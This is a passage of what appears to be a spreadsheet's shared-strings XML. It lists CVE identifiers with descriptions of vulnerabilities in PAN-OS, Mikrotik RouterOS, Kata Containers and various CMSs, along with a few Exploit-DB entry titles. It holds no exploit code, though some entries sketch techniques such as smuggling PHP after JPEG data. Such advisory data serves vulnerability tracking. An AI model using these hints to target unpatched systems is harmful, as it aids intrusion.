    <t>An external control of filename vulnerability in the command processing of PAN-OS allows an authenticated administrator to delete arbitrary system files affecting the integrity of the system or causing denial of service to all PAN-OS services. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions before 8.1.14; PAN-OS 9.0 versions before 9.0.7; PAN-OS 9.1 versions before 9.1.1.</t>
  </si>
  <si>
    <t>CVE-2020-2004</t>
  </si>
  <si>
    <t>Under certain circumstances a user's password may be logged in cleartext in the PanGPS.log diagnostic file when logs are collected for troubleshooting on GlobalProtect app (also known as GlobalProtect Agent) for MacOS and Windows. For this issue to occur all of these conditions must be true: (1) 'Save User Credential' option should be set to 'Yes' in the GlobalProtect Portal's Agent configuration, (2) the GlobalProtect user manually selects a gateway, (3) and the logging level is set to 'Dump' while collecting troubleshooting logs. This issue does not affect GlobalProtect app on other platforms (for example iOS/Android/Linux). This issue affects GlobalProtect app 5.0 versions earlier than 5.0.9, GlobalProtect app 5.1 versions earlier than 5.1.2 on Windows or MacOS. Since becoming aware of the issue, Palo Alto Networks has safely deleted all the known GlobalProtectLogs zip files sent by customers with the credentials. We now filter and remove these credentials from all files sent to Customer Support. The GlobalProtectLogs zip files uploaded to Palo Alto Networks systems were only accessible by authorized personnel with valid Palo Alto Networks credentials. We do not have any evidence of malicious access or use of these credentials.</t>
  </si>
  <si>
    <t>CVE-2020-2005</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability exists when visiting malicious websites with the Palo Alto Networks GlobalProtect Clientless VPN that can compromise the user's active session. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.7; All versions of PAN-OS 8.0.</t>
  </si>
  <si>
    <t>CVE-2020-2006</t>
  </si>
  <si>
    <t>A stack-based buffer overflow vulnerability in the management server component of PAN-OS that allows an authenticated user to potentially execute arbitrary code with root privileges. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14.</t>
  </si>
  <si>
    <t>CVE-2020-2007</t>
  </si>
  <si>
    <t>An OS command injection vulnerability in the management server component of PAN-OS allows an authenticated user to potentially execute arbitrary commands with root privileges. This issue affects: All PAN-OS 7.1 versions; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7.</t>
  </si>
  <si>
    <t>CVE-2020-2008</t>
  </si>
  <si>
    <t>An OS command injection and external control of filename vulnerability in Palo Alto Networks PAN-OS allows authenticated administrators to execute code with root privileges or delete arbitrary system files and impact the system's integrity or cause a denial of service condition. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14.</t>
  </si>
  <si>
    <t>CVE-2020-2009</t>
  </si>
  <si>
    <t>An external control of filename vulnerability in the SD WAN component of Palo Alto Networks PAN-OS Panorama allows an authenticated administrator to send a request that results in the creation and write of an arbitrary file on all firewalls managed by the Panorama. In some cases this results in arbitrary code execution with root permissions. This issue affects: All versions of PAN-OS 7.1; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7.</t>
  </si>
  <si>
    <t>CVE-2020-20092</t>
  </si>
  <si>
    <t>File Upload vulnerability exists in ArticleCMS 1.0 via the image upload feature at /admin by changing the Content-Type to image/jpeg and placing PHP code after the JPEG data, which could let a remote malicious user execute arbitrary PHP code.</t>
  </si>
  <si>
    <t>CVE-2020-20093</t>
  </si>
  <si>
    <t>The Facebook Messenger app for iOS 227.0 and prior and Android 228.1.0.10.116 and prior user interface does not properly represent URI messages to the user, which results in URI spoofing via specially crafted messages.</t>
  </si>
  <si>
    <t>CVE-2020-20094</t>
  </si>
  <si>
    <t>Instagram iOS 106.0 and prior and Android 107.0.0.11 and prior user interface does not properly represent URI messages to the user, which results in URI spoofing via specially crafted messages</t>
  </si>
  <si>
    <t>CVE-2020-20095</t>
  </si>
  <si>
    <t>iMessage (Messages app) iOS 12.4 and prior user interface does not properly represent URI messages to the user, which results in URI spoofing via specially crafted messages.</t>
  </si>
  <si>
    <t>CVE-2020-20096</t>
  </si>
  <si>
    <t>Whatsapp iOS 2.19.80 and prior and Android 2.19.222 and prior user interface does not properly represent URI messages to the user, which results in URI spoofing via specially crafted messages.</t>
  </si>
  <si>
    <t>CVE-2020-2010</t>
  </si>
  <si>
    <t>An OS command injection vulnerability in PAN-OS management interface allows an authenticated administrator to execute arbitrary OS commands with root privileges. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7.</t>
  </si>
  <si>
    <t>CVE-2020-2011</t>
  </si>
  <si>
    <t>An improper input validation vulnerability in the configuration daemon of Palo Alto Networks PAN-OS Panorama allows for a remote unauthenticated user to send a specifically crafted registration request to the device that causes the configuration service to crash. Repeated attempts to send this request result in denial of service to all PAN-OS Panorama services by restarting the device and putting it into maintenance mode. This issue affects: All versions of PAN-OS 7.1, PAN-OS 8.0; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7; PAN-OS 9.1 versions earlier than 9.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-2012</t>
  </si>
  <si>
    <t>Improper restriction of XML external entity reference ('XXE') vulnerability in Palo Alto Networks Panorama management service allows remote unauthenticated attackers with network access to the Panorama management interface to read arbitrary files on the system. This issue affects: All versions of PAN-OS for Panorama 7.1 and 8.0; PAN-OS for Panorama 8.1 versions earlier than 8.1.13; PAN-OS for Panorama 9.0 versions earlier than 9.0.7.</t>
  </si>
  <si>
    <t>CVE-2020-20120</t>
  </si>
  <si>
    <t>ThinkPHP v3.2.3 and below contains a SQL injection vulnerability which is triggered when the array is not passed to the "where" and "query" methods.</t>
  </si>
  <si>
    <t>CVE-2020-20122</t>
  </si>
  <si>
    <t>Wuzhi CMS v4.1 contains a SQL injection vulnerability in the checktitle() function in /coreframe/app/content/admin/content.php.</t>
  </si>
  <si>
    <t>CVE-2020-20124</t>
  </si>
  <si>
    <t>Wuzhi CMS v4.1.0 contains a remote code execution (RCE) vulnerability in \attachment\admin\index.php.</t>
  </si>
  <si>
    <t>CVE-2020-20125</t>
  </si>
  <si>
    <t>EARCLINK ESPCMS-P8 contains a cross-site scripting (XSS) vulnerability in espcms_web\espcms_load.php.</t>
  </si>
  <si>
    <t>CVE-2020-20128</t>
  </si>
  <si>
    <t>LaraCMS v1.0.1 transmits sensitive information in cleartext which can be intercepted by attackers.</t>
  </si>
  <si>
    <t>CVE-2020-20129</t>
  </si>
  <si>
    <t>LaraCMS v1.0.1 contains a stored cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the content editor.</t>
  </si>
  <si>
    <t>CVE-2020-2013</t>
  </si>
  <si>
    <t>A cleartext transmission of sensitive information vulnerability in Palo Alto Networks PAN-OS Panorama that discloses an authenticated PAN-OS administrator's PAN-OS session cookie. When an administrator issues a context switch request into a managed firewall with an affected PAN-OS Panorama version, their PAN-OS session cookie is transmitted over cleartext to the firewall. An attacker with the ability to intercept this network traffic between the firewall and Panorama can access the administrator's account and further manipulate devices managed by Panorama. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; PAN-OS 9.1 versions earlier than 9.1.1; All version of PAN-OS 8.0;</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49305.txt</t>
  </si>
  <si>
    <t>Flexmonster Pivot Table &amp; Charts 2.7.17 - 'Remote JSON' Reflected XSS</t>
  </si>
  <si>
    <t>CVE-2020-20131</t>
  </si>
  <si>
    <t>LaraCMS v1.0.1 contains a stored cross-site scripting (XSS) vulnerability which allows atackers to execute arbitrary web scripts or HTML via a crafted payload in the page management module.</t>
  </si>
  <si>
    <t>CVE-2020-20136</t>
  </si>
  <si>
    <t>QuantConnect Lean versions from 2.3.0.0 to 2.4.0.1 are affected by an insecure deserialization vulnerability due to insecure configuration of TypeNameHandling property in Json.NET library.</t>
  </si>
  <si>
    <t>CVE-2020-20138</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in the Showtime2 Slideshow module in CMS Made Simple (CMSMS) 2.2.4.</t>
  </si>
  <si>
    <t>CVE-2020-20139</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in the Remote JSON component Under the Connect menu in Flexmonster Pivot Table &amp; Charts 2.7.17.</t>
  </si>
  <si>
    <t>CVE-2020-2014</t>
  </si>
  <si>
    <t>An OS Command Injection vulnerability in PAN-OS management server allows authenticated users to inject and execute arbitrary shell commands with root privileges. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49304.txt</t>
  </si>
  <si>
    <t>Flexmonster Pivot Table &amp; Charts 2.7.17 - 'To remote CSV' Reflected XSS</t>
  </si>
  <si>
    <t>CVE-2020-20140</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Remote Report component under the Open menu in Flexmonster Pivot Table &amp; Charts 2.7.17.</t>
  </si>
  <si>
    <t>CVE-2020-20141</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in the To OLAP (XMLA) component Under the Connect menu in Flexmonster Pivot Table &amp; Charts 2.7.17.</t>
  </si>
  <si>
    <t>CVE-2020-20142</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in the "To Remote CSV" component under "Open" Menu in Flexmonster Pivot Table &amp; Charts 2.7.17.</t>
  </si>
  <si>
    <t>CVE-2020-2015</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the PAN-OS management server allows authenticated users to crash system processes or potentially execute arbitrary code with root privileges. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.7; PAN-OS 9.1 versions earlier than 9.1.1; All versions of PAN-OS 8.0.</t>
  </si>
  <si>
    <t>CVE-2020-2016</t>
  </si>
  <si>
    <t>A race condition due to insecure creation of a file in a temporary directory vulnerability in PAN-OS allows for root privilege escalation from a limited linux user account. This allows an attacker who has escaped the restricted shell as a low privilege administrator, possibly by exploiting another vulnerability, to escalate privileges to become root user. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; All versions of PAN-OS 8.0.</t>
  </si>
  <si>
    <t>CVE-2020-2017</t>
  </si>
  <si>
    <t>A DOM-Based Cross Site Scripting Vulnerability exists in PAN-OS and Panorama Management Web Interfaces. A remote attacker able to convince an authenticated administrator to click on a crafted link to PAN-OS and Panorama Web Interfaces could execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; All versions of PAN-OS 8.0.</t>
  </si>
  <si>
    <t>CVE-2020-20178</t>
  </si>
  <si>
    <t>Ethereum 0xe933c0cd9784414d5f278c114904f5a84b396919#code.sol latest version is affected by a denial of service vulnerability in the affected payout function. Once the length of this array is too long, it will result in an exception. Attackers can make attacks by creating a series of account addresses.</t>
  </si>
  <si>
    <t>CVE-2020-2018</t>
  </si>
  <si>
    <t>An authentication bypass vulnerability in the Panorama context switching feature allows an attacker with network access to a Panorama's management interface to gain privileged access to managed firewalls. An attacker requires some knowledge of managed firewalls to exploit this issue. This issue does not affect Panorama configured with custom certificates authentication for communication between Panorama and managed devices. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.12; PAN-OS 9.0 versions earlier than 9.0.6; All versions of PAN-OS 8.0.</t>
  </si>
  <si>
    <t>CVE-2020-20183</t>
  </si>
  <si>
    <t>Insecure direct object reference vulnerability in Zyxel’s P1302-T10 v3 with firmware version 2.00(ABBX.3) and earlier allows attackers to gain privileges and access certain admin pages.</t>
  </si>
  <si>
    <t>CVE-2020-20184</t>
  </si>
  <si>
    <t>GateOne allows remote attackers to execute arbitrary commands via shell metacharacters in the port field when attempting an SSH connection.</t>
  </si>
  <si>
    <t>CVE-2020-20189</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in NewPK 1.1 via the title parameter to admin\newpost.php.</t>
  </si>
  <si>
    <t>CVE-2020-2020</t>
  </si>
  <si>
    <t>An improper handling of exceptional conditions vulnerability in Cortex XDR Agent allows a local authenticated Windows user to create files in the software's internal program directory that prevents the Cortex XDR Agent from starting. The exceptional condition is persistent and prevents Cortex XDR Agent from starting when the software or machine is restarted. This issue impacts: Cortex XDR Agent 5.0 versions earlier than 5.0.10; Cortex XDR Agent 6.1 versions earlier than 6.1.7; Cortex XDR Agent 7.0 versions earlier than 7.0.3; Cortex XDR Agent 7.1 versions earlier than 7.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-2021</t>
  </si>
  <si>
    <t>When Security Assertion Markup Language (SAML) authentication is enabled and the 'Validate Identity Provider Certificate' option is disabled (unchecked), improper verification of signatures in PAN-OS SAML authentication enables an unauthenticated network-based attacker to access protected resources. The attacker must have network access to the vulnerable server to exploit this vulnerability. This issue affects PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL). This issue does not affect PAN-OS 7.1. This issue cannot be exploited if SAML is not used for authentication. This issue cannot be exploited if the 'Validate Identity Provider Certificate' option is enabled (checked) in the SAML Identity Provider Server Profile. Resources that can be protected by SAML-based single sign-on (SSO) authentication are: GlobalProtect Gateway, GlobalProtect Portal, GlobalProtect Clientless VPN, Authentication and Captive Portal, PAN-OS next-generation firewalls (PA-Series, VM-Series) and Panorama web interfaces, Prisma Access In the case of GlobalProtect Gateways, GlobalProtect Portal, Clientless VPN, Captive Portal, and Prisma Access, an unauthenticated attacker with network access to the affected servers can gain access to protected resources if allowed by configured authentication and Security policies. There is no impact on the integrity and availability of the gateway, portal or VPN server. An attacker cannot inspect or tamper with sessions of regular users. In the worst case, this is a critical severity vulnerability with a CVSS Base Score of 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N). In the case of PAN-OS and Panorama web interfaces, this issue allows an unauthenticated attacker with network access to the PAN-OS or Panorama web interfaces to log in as an administrator and perform administrative actions. In the worst-case scenario, this is a critical severity vulnerability with a CVSS Base Score of 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). If the web interfaces are only accessible to a restricted management network, then the issue is lowered to a CVSS Base Score of 9.6 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). Palo Alto Networks is not aware of any malicious attempts to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-20211</t>
  </si>
  <si>
    <t>Mikrotik RouterOs 6.44.5 (long-term tree) suffers from an assertion failure vulnerability in the /nova/bin/console process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-20212</t>
  </si>
  <si>
    <t>Mikrotik RouterOs 6.44.5 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/console process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).</t>
  </si>
  <si>
    <t>CVE-2020-20213</t>
  </si>
  <si>
    <t>Mikrotik RouterOs 6.44.5 (long-term tree) suffers from an stack exhaustion vulnerability in the /nova/bin/net process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU.</t>
  </si>
  <si>
    <t>CVE-2020-20214</t>
  </si>
  <si>
    <t>Mikrotik RouterOs 6.44.6 (long-term tree) suffers from an assertion failure vulnerability in the btest process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-20215</t>
  </si>
  <si>
    <t>Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/diskd process. An authenticated remote attacker can cause a Denial of Service due to invalid memory access.</t>
  </si>
  <si>
    <t>CVE-2020-20216</t>
  </si>
  <si>
    <t>Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/graphing process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).</t>
  </si>
  <si>
    <t>CVE-2020-20217</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before 6.47 (stable tree) suffers from an uncontrolled resource consumption vulnerability in the /nova/bin/route process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU.</t>
  </si>
  <si>
    <t>CVE-2020-20218</t>
  </si>
  <si>
    <t>Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/traceroute process. An authenticated remote attacker can cause a Denial of Service due via the loop counter variable.</t>
  </si>
  <si>
    <t>CVE-2020-20219</t>
  </si>
  <si>
    <t>Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/igmp-proxy process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).</t>
  </si>
  <si>
    <t>CVE-2020-2022</t>
  </si>
  <si>
    <t>An information exposure vulnerability exists in Palo Alto Networks Panorama software that discloses the token for the Panorama web interface administrator's session to a managed device when the Panorama administrator performs a context switch into that device. This vulnerability allows an attacker to gain privileged access to the Panorama web interface. An attacker requires some knowledge of managed firewalls to exploit this issue. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.17; PAN-OS 9.0 versions earlier than PAN-OS 9.0.11; PAN-OS 9.1 versions earlier than PAN-OS 9.1.5.</t>
  </si>
  <si>
    <t>CVE-2020-20220</t>
  </si>
  <si>
    <t>Mikrotik RouterOs prior to stable 6.47 suffers from a memory corruption vulnerability in the /nova/bin/bfd process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).</t>
  </si>
  <si>
    <t>CVE-2020-20221</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before 6.44.6 (long-term tree) suffers from an uncontrolled resource consumption vulnerability in the /nova/bin/cerm process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU.</t>
  </si>
  <si>
    <t>CVE-2020-20222</t>
  </si>
  <si>
    <t>Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/sniffer process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).</t>
  </si>
  <si>
    <t>CVE-2020-20225</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before 6.47 (stable tree) suffers from an assertion failure vulnerability in the /nova/bin/user process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-20227</t>
  </si>
  <si>
    <t>Mikrotik RouterOs stable 6.47 suffers from a memory corruption vulnerability in the /nova/bin/diskd process. An authenticated remote attacker can cause a Denial of Service due to invalid memory access.</t>
  </si>
  <si>
    <t>CVE-2020-2023</t>
  </si>
  <si>
    <t>Kata Containers doesn't restrict containers from accessing the guest's root filesystem device. Malicious containers can exploit this to gain code execution on the guest and masquerade as the kata-agent. This issue affects Kata Containers 1.11 versions earlier than 1.11.1; Kata Containers 1.10 versions earlier than 1.10.5; and Kata Containers 1.9 and earlier versions.</t>
  </si>
  <si>
    <t>CVE-2020-20230</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before stable 6.47 suffers from an uncontrolled resource consumption in the sshd process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU.</t>
  </si>
  <si>
    <t>CVE-2020-20231</t>
  </si>
  <si>
    <t>Mikrotik RouterOs through stable version 6.48.3 suffers from a memory corruption vulnerability in the /nova/bin/detnet process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).</t>
  </si>
  <si>
    <t>CVE-2020-20236</t>
  </si>
  <si>
    <t>Mikrotik RouterOs 6.46.3 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/sniffer process. An authenticated remote attacker can cause a Denial of Service due to improper memory access.</t>
  </si>
  <si>
    <t>CVE-2020-20237</t>
  </si>
  <si>
    <t>CVE-2020-2024</t>
  </si>
  <si>
    <t>An improper link resolution vulnerability affects Kata Containers versions prior to 1.11.0. Upon container teardown, a malicious guest can trick the kata-runtime into unmounting any mount point on the host and all mount points underneath it, potentiality resulting in a host DoS.</t>
  </si>
  <si>
    <t>CVE-2020-20245</t>
  </si>
  <si>
    <t>Mikrotik RouterOs stable 6.46.3 suffers from a memory corruption vulnerability in the log process. An authenticated remote attacker can cause a Denial of Service due to improper memory access.</t>
  </si>
  <si>
    <t>CVE-2020-20246</t>
  </si>
  <si>
    <t>Mikrotik RouterOs stable 6.46.3 suffers from a memory corruption vulnerability in the mactel process. An authenticated remote attacker can cause a Denial of Service due to improper memory access.</t>
  </si>
  <si>
    <t>CVE-2020-20247</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before 6.46.5 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/traceroute process. An authenticated remote attacker can cause a Denial of Service due via the loop counter variable.</t>
  </si>
  <si>
    <t>CVE-2020-20248</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before stable 6.47 suffers from an uncontrolled resource consumption in the memtest process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU.</t>
  </si>
  <si>
    <t>CVE-2020-20249</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before stable 6.47 suffers from a memory corruption vulnerability in the resolver process. By sending a crafted packet, an authenticated remote attacker can cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-2025</t>
  </si>
  <si>
    <t>Kata Containers before 1.11.0 on Cloud Hypervisor persists guest filesystem changes to the underlying image file on the host. A malicious guest can overwrite the image file to gain control of all subsequent guest VMs. Since Kata Containers uses the same VM image file with all VMMs, this issue may also affect QEMU and Firecracker based guests.</t>
  </si>
  <si>
    <t>CVE-2020-20250</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before stable version 6.47 suffers from a memory corruption vulnerability in the /nova/bin/lcdstat process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference). NOTE: this is different from CVE-2020-20253 and CVE-2020-20254. All four vulnerabilities in the /nova/bin/lcdstat process are discussed in the CVE-2020-20250 github.com/cq674350529 reference.</t>
  </si>
  <si>
    <t>CVE-2020-20252</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before stable version 6.47 suffers from a memory corruption vulnerability in the /nova/bin/lcdstat process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).</t>
  </si>
  <si>
    <t>CVE-2020-20253</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before 6.47 (stable tree) suffers from a divison by zero vulnerability in the /nova/bin/lcdstat process. An authenticated remote attacker can cause a Denial of Service due to a divide by zero error.</t>
  </si>
  <si>
    <t>CVE-2020-20254</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/lcdstat process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).</t>
  </si>
  <si>
    <t>CVE-2020-2026</t>
  </si>
  <si>
    <t>A malicious guest compromised before a container creation (e.g. a malicious guest image or a guest running multiple containers) can trick the kata runtime into mounting the untrusted container filesystem on any host path, potentially allowing for code execution on the host. This issue affects: Kata Containers 1.11 versions earlier than 1.11.1; Kata Containers 1.10 versions earlier than 1.10.5; Kata Containers 1.9 and earlier versions.</t>
  </si>
  <si>
    <t>CVE-2020-20262</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before 6.47 (stable tree) suffers from an assertion failure vulnerability in the /ram/pckg/security/nova/bin/ipsec process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-20264</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before 6.47 (stable tree) in the /ram/pckg/advanced-tools/nova/bin/netwatch process. An authenticated remote attacker can cause a Denial of Service due to a divide by zero error.</t>
  </si>
  <si>
    <t>CVE-2020-20265</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /ram/pckg/wireless/nova/bin/wireless process. An authenticated remote attacker can cause a Denial of Service due via a crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-20266</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/dot1x process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).</t>
  </si>
  <si>
    <t>CVE-2020-20267</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/resolver process. An authenticated remote attacker can cause a Denial of Service due to invalid memory access.</t>
  </si>
  <si>
    <t>CVE-2020-20269</t>
  </si>
  <si>
    <t>A specially crafted Markdown document could cause the execution of malicious JavaScript code in Caret Editor before 4.0.0-rc22.</t>
  </si>
  <si>
    <t>CVE-2020-2027</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the authd component of the PAN-OS management server allows authenticated administrators to disrupt system processes and potentially execute arbitrary code with root privileges. This issue affects: All versions of PAN-OS 7.1 and PAN-OS 8.0; PAN-OS 8.1 versions earlier than PAN-OS 8.1.13; PAN-OS 9.0 versions earlier than PAN-OS 9.0.7.</t>
  </si>
  <si>
    <t>exploits/linux/remote/51000.txt</t>
  </si>
  <si>
    <t>uftpd 2.10 - Directory Traversal (Authenticated)</t>
  </si>
  <si>
    <t>2022-08-02</t>
  </si>
  <si>
    <t>CVE-2020-20276</t>
  </si>
  <si>
    <t>An unauthenticated stack-based buffer overflow vulnerability in common.c's handle_PORT in uftpd FTP server versions 2.10 and earlier can be abused to cause a crash and could potentially lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-20277</t>
  </si>
  <si>
    <t>There are multiple unauthenticated directory traversal vulnerabilities in different FTP commands in uftpd FTP server versions 2.7 to 2.10 due to improper implementation of a chroot jail in common.c's compose_abspath function that can be abused to read or write to arbitrary files on the filesystem, leak process memory, or potentially lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-2028</t>
  </si>
  <si>
    <t>An OS Command Injection vulnerability in PAN-OS management server allows authenticated administrators to execute arbitrary OS commands with root privileges when uploading a new certificate in FIPS-CC mode. This issue affects: All versions of PAN-OS 7.1 and PAN-OS 8.0; PAN-OS 8.1 versions earlier than PAN-OS 8.1.13; PAN-OS 9.0 versions earlier than PAN-OS 9.0.7.</t>
  </si>
  <si>
    <t>CVE-2020-20285</t>
  </si>
  <si>
    <t>There is a XSS in the user login page in zzcms 2019. Users can inject js code by the referer header via user/login.php</t>
  </si>
  <si>
    <t>CVE-2020-20287</t>
  </si>
  <si>
    <t>Unrestricted file upload vulnerability in the yccms 3.3 project. The xhUp function's improper judgment of the request parameters, triggers remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-20289</t>
  </si>
  <si>
    <t>Sql injection vulnerability in the yccms 3.3 project. The no_top function's improper judgment of the request parameters, triggers a sql injection vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2029</t>
  </si>
  <si>
    <t>An OS Command Injection vulnerability in the PAN-OS web management interface allows authenticated administrators to execute arbitrary OS commands with root privileges by sending a malicious request to generate new certificates for use in the PAN-OS configuration. This issue affects: All versions of PAN-OS 8.0; PAN-OS 7.1 versions earlier than PAN-OS 7.1.26; PAN-OS 8.1 versions earlier than PAN-OS 8.1.13.</t>
  </si>
  <si>
    <t>CVE-2020-20290</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in the yccms 3.3 project. The delete, deletesite, and deleteAll functions' improper judgment of the request parameters, triggers a directory traversal vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-20294</t>
  </si>
  <si>
    <t>An issue was found in CMSWing project version 1.3.8. Because the log function does not check the log parameter, malicious parameters can execute arbitrary commands.</t>
  </si>
  <si>
    <t>CVE-2020-20295</t>
  </si>
  <si>
    <t>An issue was found in CMSWing project version 1.3.8. Because the updateAction function does not check the detail parameter, malicious parameters can execute arbitrary SQL commands.</t>
  </si>
  <si>
    <t>CVE-2020-20296</t>
  </si>
  <si>
    <t>An issue was found in CMSWing project version 1.3.8, Because the rechargeAction function does not check the balance parameter, malicious parameters can execute arbitrary SQL commands.</t>
  </si>
  <si>
    <t>CVE-2020-20298</t>
  </si>
  <si>
    <t>Eval injection vulnerability in the parserCommom method in the ParserTemplate class in zzz_template.php in zzzphp 1.7.2 allows remote attackers to execute arbitrary commands.</t>
  </si>
  <si>
    <t>CVE-2020-20299</t>
  </si>
  <si>
    <t>WeiPHP 5.0 does not properly restrict access to pages, related to using POST.</t>
  </si>
  <si>
    <t>CVE-2020-2030</t>
  </si>
  <si>
    <t>An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts PAN-OS 8.1 versions earlier than PAN-OS 8.1.15; and all versions of PAN-OS 7.1 and PAN-OS 8.0. This issue does not impact PAN-OS 9.0, PAN-OS 9.1, or Prisma Access services.</t>
  </si>
  <si>
    <t>CVE-2020-20300</t>
  </si>
  <si>
    <t>SQL injection vulnerability in the wp_where function in WeiPHP 5.0.</t>
  </si>
  <si>
    <t>CVE-2020-2031</t>
  </si>
  <si>
